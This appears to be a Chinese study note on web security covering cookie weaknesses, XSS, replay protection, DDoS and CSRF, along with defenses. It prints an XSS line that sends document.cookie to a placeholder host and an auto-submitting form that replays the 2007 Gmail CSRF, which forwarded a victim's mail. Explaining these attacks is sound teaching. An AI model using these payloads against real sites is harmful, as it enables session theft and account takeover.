网络安全问题

Cookie

---

• cookie为何不安全？（篡改、劫持、作用域攻击）

因为其存储在用户浏览器本地，一大别人利用抓包或脚本获取到cookie信息，可以利用其来伪装授权并获取用户信息。

XSS攻击：

XSS. Cross-Site Scripting（跨站脚本攻击）简称XSS，是一种代码注入攻击。 攻击者通过在目标网站上注入恶意脚本，使之在用户的浏览器上运行。 利用这些恶意脚本，攻击者可获取用户的敏感信息如Cookie、SessionID 等。

攻击方式：1、诱导用户点击某些url，包含一些非法标签或脚本；2、黑客将利用服务器接口将代码存储到服务器，待用户访问到相关页面资源时就会执行恶意代码。

XSS攻击示例:

<script>document.location='<http://xxx.com/getCookie.php?cookie='+document.cookie;></script>

• 如果一定要使用cookie，如何解决安全问题？

1、cookie有效时间不易过长，且配合session使用，重要的数据不放cookie放在session中存储。

2、设置HttpOnly属性为true，可以防止使用js脚本读取到cookie信息。（HttpOnly是包含在Set-Cookie HTTP响应头文件中的附加标志。生成cookie时使用HttpOnly标志有助于降低客户端脚本访问受保护cookie的风险，但需要浏览器支持）

3、对k-v对中的v尽可能地设计一个比较复杂的值，并进行加密，比如：用户名+cookie有效时间+当前时间戳+随机数

4、尽可能使用HTTPS，即tls证书，并为cookie设置Secure属性为true，它的意思是，cookie只能使用https协议发送给服务器

API防重放机制

---

概念

笼统点来说，就是拿你的请求原封不动地再发送一次或N次。。

问题

1、如果请求涉及数据库插入操作，可能导致多条重复数据。

2、如果是查询操作，而且比较慢的查询，那么可能打垮数据库。

解决方案

1、timestamp

服务的约定只接受xx时间内请求，可以在header中增加timestamp-时间戳，每次请求服务器进行校验，超过约定时间认为重复请求。

2、nonce

同样约定一个有效时间，客户端对每个请求生成一个唯一标识，一般用UUID来做，服务器在接收到请求后进行校验，超过约定时间认为重放请求。

PS：一般在网关做这一层校验

问题：HTTPS是否可以防重放

否。只能防止明文数据被抓取。

DDOS（分布式拒绝服务攻击）

---

先了解DOS：

利用合理的服务请求来占用过多的服务资源，从而使服务器无法处理合法用户的指令。

DDOS

DDOS就是在DOS的基础上增加一些傀儡机（优先考虑离目标网络距离近的机器，因为经过路由器的跳数少，效果好。），发起更大规模的攻击，从而致使服务器接收不了正常的请求。

CSRF（Cross-site request forgery）跨站请求伪造

---

攻击者诱导受害者进入第三方网站，在第三方网站中，向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证，绕过后台的用户验证，达到冒充用户对被攻击的网站执行某项操作的目的。

常见流程如下：

• 受害者登录a.com，并保留了登录凭证（Cookie）。
• 攻击者引诱受害者访问了b.com。
• b.com 向 a.com 发送了一个请求：a.com/act=xx。浏览器会默认携带a.com的Cookie。
• a.com接收到请求后，对请求进行验证，并确认是受害者的凭证，误以为是受害者自己发送的请求。
• a.com以受害者的名义执行了act=xx。
• 攻击完成，攻击者在受害者不知情的情况下，冒充受害者，让a.com执行了自己定义的操作。

2007年Gmail的CSRF漏洞：小A在自己的邮箱中点开一个链接，结果所有邮件都被拦截并转发到别处。

<form method="POST" action="<https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf>" enctype="multipart/form-data"> 
    <input type="hidden" name="cf2_emc" value="true"/> 
    <input type="hidden" name="cf2_email" value="hacker@hakermail.com"/> 
    .....
    <input type="hidden" name="irf" value="on"/> 
    <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> 
</form> 
<script> 
    document.forms[0].submit();
</script>

这个页面只要打开，就会向Gmail发送一个post请求。请求中，执行了“Create Filter”命令，将所有的邮件，转发到“hacker@hackermail.com”。 小A由于刚刚就登陆了Gmail，所以这个请求发送时，携带着小A的登录凭证（Cookie），Gmail的后台接收到请求，验证了确实有小A的登录凭证，于是成功给小明配置了过滤器。 黑客可以查看小A的所有邮件，包括邮件里的域名验证码等隐私信息。拿到验证码之后，黑客就可以要求域名服务商把域名重置给自己。